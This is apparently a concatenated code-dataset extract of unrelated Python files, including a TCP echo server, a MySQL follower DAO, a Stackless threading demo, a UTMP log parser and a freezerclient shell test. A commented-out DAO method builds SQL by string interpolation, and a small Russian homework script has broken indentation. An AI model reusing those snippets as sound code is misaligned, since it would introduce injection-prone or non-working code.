ax2.set_xticklabels(labels, fontsize=16)
ax2.legend(loc='best', fontsize=11)
# ax2.legend(loc='best', fontsize=14)
fig.tight_layout()
plt.show()
fig.savefig('Growth rate simulation case2_1.png')
| 2.109375 | 2 |
src/pyTCP/server.py | nimpsch/pyTCP | 0 | 12772898 | import select
import socketserver
import threading
from queue import Queue
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    # TCP server that handles each client in its own thread; all behaviour
    # comes from the two stdlib mix-ins.
    pass
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """A threaded TCP request handler that echoes received data.

    The owning :class:`EchoServer` is reachable as ``self.server.instance``;
    each received message is echoed back to the client and recorded via
    ``EchoServer._add``.
    """

    def handle(self):
        """Echo loop for one client connection.

        Polls the socket with a 1 s timeout so the owner's ``keep_alive``
        flag is re-checked regularly.

        Fix: ``socket.recv`` returns ``b''`` (never ``None``) when the peer
        closes the connection; the original compared against ``None`` and
        therefore busy-looped forever echoing empty messages on a closed
        socket.  We now break out of the loop on EOF.
        """
        while self.server.instance.keep_alive:
            ready_read, _, _ = select.select([self.request], [], [], 1)
            if self.request in ready_read:
                recv_msg = self.request.recv(self.server.instance.receive_bytes)
                if not recv_msg:
                    # Peer closed the connection -- stop handling it.
                    break
                self.request.sendall(recv_msg)
                self.server.instance._add(recv_msg)
class EchoServer:
    """A threaded TCP echo server.

    Parameters
    ----------
    ip : str
        The address the server binds to.
    port : int
        The port the server listens on.
    receive_bytes : int, default 4096
        Maximum number of bytes read from the socket per ``recv`` call
        (fewer may be returned if fewer are available).

    Fixes: the class docstring originally appeared *after* the
    ``allow_reuse_address`` assignment, so it was a plain string statement
    and never became ``EchoServer.__doc__``; it also documented a
    ``bytes_to_receive`` parameter that does not exist (the real name is
    ``receive_bytes``).
    """

    # NOTE: this mutates the stdlib TCPServer class itself, so every
    # TCPServer in the process gains SO_REUSEADDR, not just this one.
    socketserver.TCPServer.allow_reuse_address = True

    def __init__(self, ip, port, receive_bytes=4096):
        self.server = ThreadedTCPServer((ip, port), ThreadedTCPRequestHandler)
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True
        self.server.socket.setblocking(False)
        # Give request handlers a way back to this wrapper object.
        self.server.instance = self
        self.keep_alive = False
        self.receive_bytes = receive_bytes
        # Holds only the most recent message; older ones are dropped.
        self._last_received = Queue(maxsize=1)

    @property
    def last_received(self):
        """bytes: Return the last received message (blocks until one exists)."""
        return self._last_received.get()

    def start_server(self):
        """Start serving in a background daemon thread."""
        self.keep_alive = True
        self.server_thread.start()

    def stop_server(self):
        """Stop the server and release its socket."""
        self.keep_alive = False
        self.server.shutdown()
        self.server.server_close()

    def _add(self, message):
        """Store *message* as the latest value, discarding any older one."""
        if not self._last_received.full():
            self._last_received.put(message)
        else:
            self._last_received.get_nowait()
            self._last_received.put(message)
| 3.40625 | 3 |
BITs/2014/Budashov_A_E/task_3_8.py | YukkaSarasti/pythonintask | 0 | 12772899 | #Задача N3. Вариант 8
#Напишите программу, которая выводит имя "<NAME>", и
#запрашивает его псевдоним. Программа должна сцеплять две эти строки и
#выводить полученную строку, разделяя имя и псевдоним с помощью тире.
#<NAME>
#03.03.2016
print("Герой нашей сегодняшней программы-<NAME>")
psev=input("Под каким же псевдонимом он известен? Ваш ответ:")
if(psev)==("<NAME>"):
print("Все верно <NAME> -" + psev)
else:
print("Вы ошиблись, это не его псевдоним(")
input ("Press Enter to close")
| 3.953125 | 4 |
dao/FollowerDAO.py | iosTeamofFour/iAimeServer | 0 | 12772900 | <gh_stars>0
import traceback
import pymysql
from dao.DatabaseConfig import *
from pojo.Follower import Follower
class FollowerDAO:
    """Data-access object for the ``follow`` relation.

    Connection settings are taken from ``DatabaseConfig`` module globals.
    """

    __db_host = host
    __db_admin = admin
    __db_password = password
    __db = database
    __port = port
    __charset = charset

    def retrieve(self, user_id):
        """Return the list of ``Follower`` objects following *user_id*.

        Each follower's avatar and nick name are fetched from the
        ``information`` table.  Errors are logged and an empty (or partial)
        list is returned.

        Fixes: the original interpolated ``user_id`` directly into the SQL
        text (``% user_id``), an SQL-injection vector -- queries are now
        parameterized; the bare ``except`` was narrowed to ``Exception``;
        the cursor is closed before its connection.
        """
        retrieve_followers = []
        connection = pymysql.connect(host=self.__db_host, user=self.__db_admin,
                                     password=self.__db_password,
                                     database=self.__db, port=self.__port,
                                     charset=self.__charset)
        cursor = connection.cursor()
        try:
            cursor.execute(
                'select follower_id from follow where user_id = %s',
                (user_id,))
            result = cursor.fetchall()
            if result is not None:
                for follower_row in result:
                    follower = Follower()
                    follower.set_follower_id(follower_row[0])
                    cursor.execute(
                        'select avatar, nick_name from information '
                        'where user_id = %s',
                        (follower.get_follower_id(),))
                    sub_result = cursor.fetchone()
                    follower.set_avatar(sub_result[0])
                    follower.set_name(sub_result[1])
                    retrieve_followers.append(follower)
        except Exception:
            traceback.print_exc()
        finally:
            cursor.close()
            connection.close()
        return retrieve_followers
    # Retrieve complete follower profiles (currently unused; kept commented out).
# def get(self, followers):
# connection = pymysql.connect(self.__db_host, self.__db_admin, self.__db_password, self.__db, charset='utf8')
# cursor = connection.cursor()
# results = []
#
# try:
# for index in range(len(followers)):
# sql = 'select * from user where user_id = %s' % (followers[index].get_follower_id())
# cursor.execute(sql)
# retrieve_user = cursor.fetchone()
# result = {
# "NickName": retrieve_user[3],
# "UserID": retrieve_user[0],
# "Avatar": retrieve_user[4],
# }
# results.append(result)
# return results
# except:
# traceback.print_exc()
# finally:
# connection.close()
# cursor.close()
# follower_dao = FollowerDAO()
# print(follower_dao.retrieve(1)) | 2.421875 | 2 |
stackless/threadscheduling.py | irr/python-labs | 4 | 12772901 | <filename>stackless/threadscheduling.py
#
# A demonstration of how each thread has its own scheduler.
#
# Author: <NAME> <<EMAIL>>
#
# This code was written to serve as an example of Stackless Python usage.
# Feel free to email me with any questions, comments, or suggestions for
# improvement.
#
# FURTHER DETAIL:
#
# This example starts some tasklets on the main thread, and starts a second
# thread as well, starting some tasklets on that. You should be able to
# see that the scheduler on each thread is unrelated to the one on the
# other, which is why I need to start a ManageSleepingTasklets for each of
# them.
#
# POSSIBLE PROBLEMS:
#
# If Stackless complains that "run() must be run from the main thread's
# main tasklet", then you need to get a later version of Stackless.
# This constraint was removed.
#
import threading
import stackless
import time
# Thread-local storage: each OS thread keeps its own list of sleeping
# tasklets, because every thread runs its own Stackless scheduler.
_locals = threading.local()
global running  # NOTE: `global` at module level is a no-op; kept as-is
running = True
# Altered boilerplate Sleep function.
def Sleep(secondsToWait):
    # Register this tasklet's wake-up time and block on a private channel;
    # the per-thread manager tasklet sends on it once the time has passed.
    channel = stackless.channel()
    endTime = time.time() + secondsToWait
    _locals.sleepingTasklets.append((endTime, channel))
    _locals.sleepingTasklets.sort()  # keep the soonest wake-up first
    # Block until we get sent an awakening notification.
    channel.receive()
def ManageSleepingTasklets(threadID):
    # Per-thread watchdog tasklet that wakes sleepers whose deadline passed.
    # Must be started once in every thread that uses Sleep(), since each
    # thread has its own scheduler and its own _locals.sleepingTasklets.
    global running
    _locals.sleepingTasklets = []
    while running:
        if len(_locals.sleepingTasklets):
            # Entries are (endTime, channel), kept sorted by Sleep().
            endTime = _locals.sleepingTasklets[0][0]
            if endTime <= time.time():
                channel = _locals.sleepingTasklets[0][1]
                del _locals.sleepingTasklets[0]
                # We have to send something, but it doesn't matter what as it is not used.
                channel.send(None)
            elif stackless.getruncount() == 1:
                # Give up if there are no more sleeping tasklets. Otherwise the two
                # threads keep on running endlessly.
                break
        stackless.schedule()
# ...
def looping_tasklet(threadID, taskletID):
    # Worker tasklet: counts down three iterations, cooperatively sleeping
    # 1 s between prints.  (Python 2 print syntax: this demo targets
    # Stackless Python 2.)
    n = 3
    while n > 0:
        n -= 1
        print threadID, "looping_tasklet", taskletID, "loop", n
        Sleep(1.0)
    print threadID, "looping_tasklet", taskletID, "exit"
def a_main_tasklet():
    # Entry point for the second OS thread: start that thread's own sleep
    # manager and one worker tasklet, then run its (independent) scheduler.
    threadID = 2
    stackless.tasklet(ManageSleepingTasklets)(threadID)
    stackless.tasklet(looping_tasklet)(threadID, 1)
    print threadID, "runcount.1", stackless.getruncount()
    stackless.run()
if __name__ == "__main__":
threadID = 1
stackless.tasklet(ManageSleepingTasklets)(threadID)
stackless.tasklet(looping_tasklet)(threadID, 1)
stackless.tasklet(looping_tasklet)(threadID, 2)
print threadID, "runcount", stackless.getruncount()
thread = threading.Thread(target=a_main_tasklet)
thread.start()
try:
stackless.run()
except:
running = False
raise
| 3.28125 | 3 |
bvspca/core/migrations/0017_auto_20171229_1052.py | rds0751/bvspca | 10 | 12772902 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2017-12-29 17:52
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations (see file header); do not edit
    # the field definitions by hand -- regenerate the migration instead.
    dependencies = [
        ('core', '0016_auto_20171212_1107'),
    ]
    operations = [
        migrations.AlterField(
            model_name='adoptioncentre',
            name='body',
            field=wagtail.core.fields.StreamField((('picture_links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(max_length=50)), ('image', wagtail.images.blocks.ImageChooserBlock()), ('page', wagtail.core.blocks.PageChooserBlock()))), template='core/blocks/picture_links.html')),), blank=True),
        ),
        migrations.AlterField(
            model_name='teampage',
            name='group1_members',
            field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
        ),
        migrations.AlterField(
            model_name='teampage',
            name='group2_members',
            field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
        ),
        migrations.AlterField(
            model_name='teampage',
            name='group3_members',
            field=wagtail.core.fields.StreamField((('member', wagtail.core.blocks.StructBlock((('name', wagtail.core.blocks.CharBlock(max_length=50)), ('role', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('role_since', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('location', wagtail.core.blocks.CharBlock(max_length=50, required=False)), ('pets', wagtail.core.blocks.CharBlock(max_length=200, required=False)), ('bio', wagtail.core.blocks.RichTextBlock(required=False)), ('photo', wagtail.images.blocks.ImageChooserBlock(required=False))))),), blank=True, verbose_name='members'),
        ),
    ]
| 1.609375 | 2 |
lib/bindings/samples/server/debug/profiling_output.py | tlalexander/stitchEm | 182 | 12772903 | import threading
import errors
import vs
import logging
import gc
from blinker import signal
from utils import performance
from output.output import Output
# We need to be able to load (not run) vs_server on windows to generate the documentation.
# So we're skipping non-windows imports
try:
import psutil
except ImportError:
pass
PROFILING_STITCH_FORMAT = vs.NV12
class ProfilingOutput(Output):
    """Profiling output writer: measures stitching fps and CPU/GPU load.

    NOTE(review): the t_* calls (t_stop, t_writer_ok, t_writer_completed)
    and _transition_check are presumably state-machine hooks defined on the
    Output base class -- confirm there.
    """
    def __init__(self, stitcher, name="profiling", critical=False, preserved=False):
        super(ProfilingOutput, self).__init__(stitcher, name, critical, preserved)
        self.writer = None
        # psutil handle on the current process, used for CPU utilization.
        self.pid = psutil.Process()
    def reset(self):
        # Priming call: cpu_percent(interval=None) resets the measurement
        # window so the next reading covers the profiled period only.
        self._transition_check()
        self.pid.cpu_percent(interval=None)
        vs.Output_reset(self.writer.object())
    def _start(self, profiling_time=0, preserve=False):
        # Todo I don't like that it's created differently from other outputs here, but for now I left it like this
        panorama = self.stitcher.project_manager.panorama
        self.writer = vs.Output_profiling(self.name,
                                          panorama.width,
                                          panorama.height,
                                          self.stitcher.project_manager.controller.getFrameRateFromInputController(),
                                          PROFILING_STITCH_FORMAT)
        if self.writer is None:
            raise errors.InternalError()
        self.shared_writer = vs.writerSharedPtr(self.writer.object())
        self.shared_video = vs.videoWriterSharedPtr(self.shared_writer)
        self.has_audio = False
        if self.shared_video is not None and not self.stitcher.stitch_output.addWriter(self.shared_video):
            raise errors.InternalError("Cannot add profiling writer to stitcher")
        # Optionally stop automatically after profiling_time seconds.
        if profiling_time > 0:
            threading.Timer(profiling_time, self.t_stop).start()
        self.pid.cpu_percent(interval=None)
        #jump automatically from starting state to started state
        self.t_writer_ok()
    def _stop(self):
        # release() hands ownership back to native code; self.writer must
        # not be used after this point.
        self.fps = vs.Output_getFps(self.writer.release())
        self.writer = None
        logging.info("fps is %f:" % self.fps)
        logging.info("cpu_util is %d" % self.pid.cpu_percent(interval=None))
        cuda = performance.getCudaInfo()
        logging.info("gpu_util is %d" % int(cuda['utilization.gpu']))
        logging.info("enc_util is %s" % cuda['utilization.enc'])
        success = self.stitcher.stitch_output.removeWriterNoGIL(self.name)
        signal("profiling_stopping").send()
        if not success:
            raise errors.InternalError("Cannot remove writer")
        # Drop the shared pointers and force a GC pass so the native writer
        # is destroyed promptly.
        self.shared_video = None
        self.shared_writer = None
        gc.collect()
        #jump automatically from stopping state to stopped state
        self.t_writer_completed()
    def get_statistics(self):
        # Returns a snapshot dict; self.fps keeps its last value when the
        # writer has already been released.
        cuda = performance.getCudaInfo()
        self._transition_check()
        if self.writer is not None:
            self.fps = vs.Output_getFps(self.writer.object())
        return {"fps": self.fps,
                "cpu": self.pid.cpu_percent(interval=None),
                "gpu": float(cuda['utilization.gpu']),
                "enc": float(cuda['utilization.enc'])}
| 2.15625 | 2 |
examples/nonlinear_reg.py | xxao/miniml | 0 | 12772904 | import miniml
import numpy as np
# Adapted from:
# https://lucidar.me/en/neural-networks/curve-fitting-nonlinear-regression/
# Build a noisy 1-D regression data set: y = 0.1*x*cos(x) + Gaussian noise.
np.random.seed(3)
X = np.linspace(-10, 10, num=1000)
Y = 0.1*X*np.cos(X) + 0.1*np.random.normal(size=1000)
# Reshape to column vectors (n_samples, 1) as the model expects 2-D input.
X = X.reshape((len(X), 1))
Y = Y.reshape((len(Y), 1))
# Define a small fully-connected network: 1 -> 64 -> 32 -> 1.
model = miniml.Model()
model.dense(1, None, 'plain')
model.dense(64, 'relu', 'he')
model.dense(32, 'relu', 'he')
model.dense(1, None, 'plain')
# Training hyper-parameters.
rate = 0.01
epochs = 1000
# Train with Adam on mean-squared error; progress printed every 200 epochs.
optimizer = miniml.Adam(
    cost = 'mse',
    epochs = epochs,
    init_seed = 48,
    store = 10,
    verbose = 200)
costs = optimizer.train(model, X, Y, rate)
# Plot the training-cost curve and the fitted regression.
miniml.plot_costs(epochs, costs=costs)
miniml.plot_regression(model, X, Y)
| 3.296875 | 3 |
tests/test-permissions.py | maurice0918/aioftp | 0 | 12772905 | from common import * # noqa
@aioftp_setup(
    server_args=([(aioftp.User(
        base_path="tests/foo",
        home_path="/",
        permissions=[aioftp.Permission(writable=False)],
    ),)], {}))
@with_connection
@expect_codes_in_exception("550")
async def test_permission_denied(loop, client, server):
    """A user whose only permission is non-writable must receive a 550
    reply when attempting to create a directory."""
    await client.login()
    await client.make_directory("bar")
    await client.quit()
@aioftp_setup(
    server_args=([(aioftp.User(
        base_path="tests/foo",
        home_path="/",
        permissions=[
            aioftp.Permission("/", writable=False),
            aioftp.Permission("/bar"),
            aioftp.Permission("/foo"),
        ],
    ),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_permission_overriden(loop, client, server, *, tmp_dir):
    """A writable permission on /bar overrides the non-writable root
    permission, so creating and removing /bar must succeed."""
    await client.login()
    await client.make_directory("bar")
    await client.remove_directory("bar")
    await client.quit()
| 2.015625 | 2 |
Lib/GenericWebpageParser.py | rtroper0/deep-learning-data-repo | 0 | 12772906 |
# Library imports
from bs4 import BeautifulSoup
import requests
# Generic web parser providing basic functionality to load a webpage
# Use this as a base class for more specific webpage parsers
class WebpageParser:
    """Generic web page parser: loads a URL and exposes helpers for
    extracting text from the parsed document.

    Intended as a base class for more specific webpage parsers.

    Fixes applied:
    - ``getTextFromSection`` no longer raises ``AttributeError`` when the
      page failed to load (``pageContent`` is ``None``); it returns an
      empty string with a warning instead.
    - The bare ``except`` in ``loadCurrentPage`` was narrowed to
      ``Exception`` so ``KeyboardInterrupt``/``SystemExit`` propagate.
    """

    # WebpageParser version
    version = '0.1'

    # Used to request web page
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'}

    def __init__(self, url=None):
        """Store the URL (if any) and attempt to load its page."""
        # Store current URL
        self.current_url = url
        # Store full page content
        self.pageContent = None
        self.pageLoaded = False
        # Load page if URL provided (setUrl also calls loadCurrentPage).
        if url is not None:
            self.setUrl(url)

    def getVersion(self):
        """Return the parser version string."""
        return self.version

    def setUrl(self, url):
        """Set a new URL, reset cached state and attempt to load the page.

        Returns the boolean result of :meth:`loadCurrentPage`.
        """
        self.current_url = url
        self.pageContent = None
        self.pageLoaded = False
        return self.loadCurrentPage()

    def getUrl(self):
        """Return the current URL, or an empty string if none is set."""
        if self.current_url is None:
            print("Note: A valid URL has not been specified!")
            return ""
        return self.current_url

    def loadCurrentPage(self):
        """Attempt to load the current page; return True on success."""
        if self.current_url is None:
            print("Error: Cannot retrieve current page! A URL has not been specified!")
            self.pageLoaded = False
            return self.pageLoaded
        if self.pageLoaded:
            print("Note: Page has already been loaded for current URL.")
        else:
            try:
                req = requests.get(self.current_url, headers=self.headers)
                self.pageContent = BeautifulSoup(req.content, "lxml")
                self.pageLoaded = True
            except Exception:
                print("Warning: Could not load page: %s" % self.current_url)
                self.pageContent = None
                self.pageLoaded = False
        # Return Boolean indicating success or failure
        return self.pageLoaded

    def getTextFromSection(self, tag, attributes):
        """Return the text of the html section matching *tag*/*attributes*.

        *tag* is a string and *attributes* is a dictionary of
        attribute/value pairs.  Returns an empty string when no URL is set,
        the page is not loaded, or no matching section exists.
        """
        if self.current_url is None:
            print("Warning: Cannot get text from specified html, because URL has not been specified!")
            return ""
        if self.pageContent is None:
            # Page load failed (or was never attempted); nothing to search.
            print("Warning: Cannot get text, because the page is not loaded!")
            return ""
        html = self.pageContent.find(tag, attributes)
        if html is not None:
            return html.text
        print("Warning: Cannot get text from specified html! Returning empty string.")
        return ""
| 3.328125 | 3 |
plaso/parsers/utmp.py | CNR-ITTIG/plasodfaxp | 1 | 12772907 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Parser for Linux UTMP files."""
import construct
import logging
import os
import socket
from plaso.events import time_events
from plaso.lib import errors
from plaso.lib import eventdata
from plaso.parsers import interface
from plaso.parsers import manager
__author__ = '<NAME> (<EMAIL>)'
class UtmpEvent(time_events.PosixTimeEvent):
  """Convenience class for an UTMP event."""
  DATA_TYPE = u'linux:utmp:event'
  def __init__(
      self, posix_time, microsecond, user, computer_name,
      terminal, status, ip_address, structure):
    """Initializes the event object.

    Args:
      posix_time: the POSIX time value, which contains the number of seconds
                  since January 1, 1970 00:00:00 UTC.
      microsecond: number of micro seconds.
      user: active user name.
      computer_name: name of the computer.
      terminal: type of terminal.
      status: login status.
      ip_address: ip_address from the connection is done.
      structure: the parsed utmp entry structure; its exit (exit status),
                 pid (process identifier) and terminal_id (Inittab
                 identifier) attributes are copied onto the event.
    """
    super(UtmpEvent, self).__init__(
        posix_time, eventdata.EventTimestamp.START_TIME,
        micro_seconds=microsecond)
    self.computer_name = computer_name
    self.exit = structure.exit
    self.ip_address = ip_address
    self.pid = structure.pid
    self.status = status
    self.terminal_id = structure.terminal_id
    self.terminal = terminal
    self.user = user
class UtmpParser(interface.FileObjectParser):
  """Parser for Linux/Unix UTMP files."""
  _INITIAL_FILE_OFFSET = None
  NAME = u'utmp'
  DESCRIPTION = u'Parser for Linux/Unix UTMP files.'
  # Fixed-size little-endian layout of a single on-disk utmp record.
  LINUX_UTMP_ENTRY = construct.Struct(
      u'utmp_linux',
      construct.ULInt32(u'type'),
      construct.ULInt32(u'pid'),
      construct.String(u'terminal', 32),
      construct.ULInt32(u'terminal_id'),
      construct.String(u'username', 32),
      construct.String(u'hostname', 256),
      construct.ULInt16(u'termination'),
      construct.ULInt16(u'exit'),
      construct.ULInt32(u'session'),
      construct.ULInt32(u'timestamp'),
      construct.ULInt32(u'microsecond'),
      construct.ULInt32(u'address_a'),
      construct.ULInt32(u'address_b'),
      construct.ULInt32(u'address_c'),
      construct.ULInt32(u'address_d'),
      construct.Padding(20))
  LINUX_UTMP_ENTRY_SIZE = LINUX_UTMP_ENTRY.sizeof()
  # Mapping of the numeric record type to its symbolic status name.
  STATUS_TYPE = {
      0: u'EMPTY',
      1: u'RUN_LVL',
      2: u'BOOT_TIME',
      3: u'NEW_TIME',
      4: u'OLD_TIME',
      5: u'INIT_PROCESS',
      6: u'LOGIN_PROCESS',
      7: u'USER_PROCESS',
      8: u'DEAD_PROCESS',
      9: u'ACCOUNTING'}
  # Set a default test value for few fields, this is supposed to be a text
  # that is highly unlikely to be seen in a terminal field, or a username field.
  # It is important that this value does show up in such fields, but otherwise
  # it can be a free flowing text field.
  _DEFAULT_TEST_VALUE = u'Ekki Fraedilegur Moguleiki, thetta er bull ! = + _<>'
  def ParseFileObject(self, parser_mediator, file_object, **kwargs):
    """Parses an UTMP file-like object.

    Sanity-checks the first record (known type, null-terminated text
    fields, non-zero timestamp) before scanning the whole file.

    Args:
      parser_mediator: A parser mediator object (instance of ParserMediator).
      file_object: The file-like object to extract data from.

    Raises:
      UnableToParseFile: when the file cannot be parsed.
    """
    file_object.seek(0, os.SEEK_SET)
    try:
      structure = self.LINUX_UTMP_ENTRY.parse_stream(file_object)
    except (IOError, construct.FieldError) as exception:
      raise errors.UnableToParseFile(
          u'Unable to parse UTMP Header with error: {0:s}'.format(exception))
    if structure.type not in self.STATUS_TYPE:
      raise errors.UnableToParseFile((
          u'Not an UTMP file, unknown type '
          u'[{0:d}].').format(structure.type))
    if not self._VerifyTextField(structure.terminal):
      raise errors.UnableToParseFile(
          u'Not an UTMP file, unknown terminal.')
    if not self._VerifyTextField(structure.username):
      raise errors.UnableToParseFile(
          u'Not an UTMP file, unknown username.')
    if not self._VerifyTextField(structure.hostname):
      raise errors.UnableToParseFile(
          u'Not an UTMP file, unknown hostname.')
    # Check few values.
    terminal = self._GetTextFromNullTerminatedString(
        structure.terminal, self._DEFAULT_TEST_VALUE)
    if terminal == self._DEFAULT_TEST_VALUE:
      raise errors.UnableToParseFile(
          u'Not an UTMP file, no terminal set.')
    username = self._GetTextFromNullTerminatedString(
        structure.username, self._DEFAULT_TEST_VALUE)
    if username == self._DEFAULT_TEST_VALUE:
      raise errors.UnableToParseFile(
          u'Not an UTMP file, no username set.')
    if not structure.timestamp:
      raise errors.UnableToParseFile(
          u'Not an UTMP file, no timestamp set in the first record.')
    # Rewind and emit one event per record until EOF.
    file_object.seek(0, os.SEEK_SET)
    event_object = self._ReadUtmpEvent(file_object)
    while event_object:
      event_object.offset = file_object.tell()
      parser_mediator.ProduceEvent(event_object)
      event_object = self._ReadUtmpEvent(file_object)
  def _VerifyTextField(self, text):
    """Check if a byte stream is a null terminated string.

    Args:
      text: the raw text field bytes from the parsed structure.

    Return:
      True if it is a null terminated string, False otherwise.
    """
    # Everything after the first null byte must also be null.
    _, _, null_chars = text.partition(b'\x00')
    if not null_chars:
      return False
    return len(null_chars) == null_chars.count(b'\x00')
  def _ReadUtmpEvent(self, file_object):
    """Returns an UtmpEvent from a single UTMP entry.

    Args:
      file_object: a file-like object that points to an UTMP file.

    Returns:
      An event object constructed from a single UTMP record or None if we
      have reached the end of the file (or EOF).
    """
    offset = file_object.tell()
    data = file_object.read(self.LINUX_UTMP_ENTRY_SIZE)
    if not data or len(data) != self.LINUX_UTMP_ENTRY_SIZE:
      return
    try:
      entry = self.LINUX_UTMP_ENTRY.parse(data)
    except (IOError, construct.FieldError):
      logging.warning((
          u'UTMP entry at 0x{:x} couldn\'t be parsed.').format(offset))
      # NOTE(review): skipping a bad record via recursion means the depth
      # grows with each consecutive corrupt record; a loop would be safer
      # for heavily corrupted files -- TODO confirm and refactor upstream.
      return self._ReadUtmpEvent(file_object)
    user = self._GetTextFromNullTerminatedString(entry.username)
    terminal = self._GetTextFromNullTerminatedString(entry.terminal)
    if terminal == u'~':
      terminal = u'system boot'
    computer_name = self._GetTextFromNullTerminatedString(entry.hostname)
    if computer_name == u'N/A' or computer_name == u':0':
      computer_name = u'localhost'
    status = self.STATUS_TYPE.get(entry.type, u'N/A')
    if not entry.address_b:
      # Only address_a is set: treat it as a packed IPv4 address.
      try:
        ip_address = socket.inet_ntoa(
            construct.ULInt32(u'int').build(entry.address_a))
        if ip_address == u'0.0.0.0':
          ip_address = u'localhost'
      except (IOError, construct.FieldError, socket.error):
        ip_address = u'N/A'
    else:
      ip_address = u'{0:d}.{1:d}.{2:d}.{3:d}'.format(
          entry.address_a, entry.address_b, entry.address_c, entry.address_d)
    return UtmpEvent(
        entry.timestamp, entry.microsecond, user, computer_name, terminal,
        status, ip_address, entry)
  def _GetTextFromNullTerminatedString(
      self, null_terminated_string, default_string=u'N/A'):
    """Get a UTF-8 text from a raw null terminated string.

    Args:
      null_terminated_string: Raw string terminated with null character.
      default_string: The default string returned if the parser fails.

    Returns:
      A decoded UTF-8 string or if unable to decode, the supplied default
      string.
    """
    text, _, _ = null_terminated_string.partition(b'\x00')
    try:
      text = text.decode(u'utf-8')
    except UnicodeDecodeError:
      logging.warning(
          u'[UTMP] Decode UTF8 failed, the message string may be cut short.')
      text = text.decode(u'utf-8', u'ignore')
    if not text:
      return default_string
    return text
# Register the parser with the plaso parsers manager.
manager.ParsersManager.RegisterParser(UtmpParser)
| 2.578125 | 3 |
算法设计与分析/作业/homework3T2.py | TD21forever/hdu-term-project-helper | 17 | 12772908 | <filename>算法设计与分析/作业/homework3T2.py
# -*- coding: utf-8 -*-
# @Author: TD21forever
# @Date: 2019-05-25 00:18:44
# @Last Modified by: TD21forever
# @Last Modified time: 2019-05-26 11:36:12
'''
Arrange disk-track access probabilities so the pair of tracks that are
farthest apart contributes as little as possible to the expected seek
distance.  (Translated from the original Chinese note.)
'''
def solution(k, alist):
    """Return the expected seek cost for an optimized track layout.

    The access frequencies in *alist* are normalized to probabilities,
    sorted ascending and dealt alternately to the front and back of the
    layout, so the most frequent tracks end up adjacent near the middle.
    The result is ``sum over pairs i < j of p[i] * p[j] * (j - i)``.

    Args:
      k: number of tracks; unused, kept for interface compatibility.
         (Fix: the original shadowed this parameter with a local counter.)
      alist: per-track access frequencies (non-negative numbers).

    Returns:
      The expected pairwise-weighted seek distance as a float.
    """
    total = sum(alist)
    probs = sorted(freq / total for freq in alist)
    n = len(probs)
    arranged = [0.0] * n
    front, back = 0, n - 1
    # Deal sorted probabilities alternately: even ranks fill from the
    # front, odd ranks fill from the back.
    for idx, prob in enumerate(probs):
        if idx % 2 == 0:
            arranged[front] = prob
            front += 1
        else:
            arranged[back] = prob
            back -= 1
    result = 0
    for i in range(n):
        for j in range(i + 1, n):
            result += arranged[i] * arranged[j] * (j - i)
    return result
if __name__ == '__main__':
    # Example from the assignment: five tracks with the given access counts.
    rate = [33, 55, 22, 11, 9]
    k = 5
    res = solution(k,rate)
    print(res)
freezerclient/tests/unit/test_shell.py | memogarcia/python-freezerclient | 18 | 12772909 | # (c) Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
import fixtures
import io
import testtools
from testtools import matchers
from freezerclient import shell as openstack_shell
# Default credentials/endpoint used to fake the OpenStack auth environment.
DEFAULT_USERNAME = 'username'
DEFAULT_PASSWORD = 'password'
DEFAULT_PROJECT_ID = 'tenant_id'
DEFAULT_PROJECT_NAME = 'tenant_name'
DEFAULT_AUTH_URL = 'http://127.0.0.1:5000/v2.0/'
class ShellTest(testtools.TestCase):
    """Tests for the freezerclient ``FreezerShell`` command line shell."""

    FAKE_ENV = {
        'OS_USERNAME': DEFAULT_USERNAME,
        # Fix: an anonymisation placeholder (``<PASSWORD>``) had replaced
        # this constant, which was a SyntaxError and made the module
        # unimportable.
        'OS_PASSWORD': DEFAULT_PASSWORD,
        'OS_PROJECT_ID': DEFAULT_PROJECT_ID,
        'OS_PROJECT_NAME': DEFAULT_PROJECT_NAME,
        'OS_AUTH_URL': DEFAULT_AUTH_URL,
    }

    # Patch os.environ to avoid required auth info.
    def setUp(self):
        super(ShellTest, self).setUp()
        for var in self.FAKE_ENV:
            self.useFixture(
                fixtures.EnvironmentVariable(
                    var, self.FAKE_ENV[var]))

    def shell(self, argstr, check=False, expected_val=0):
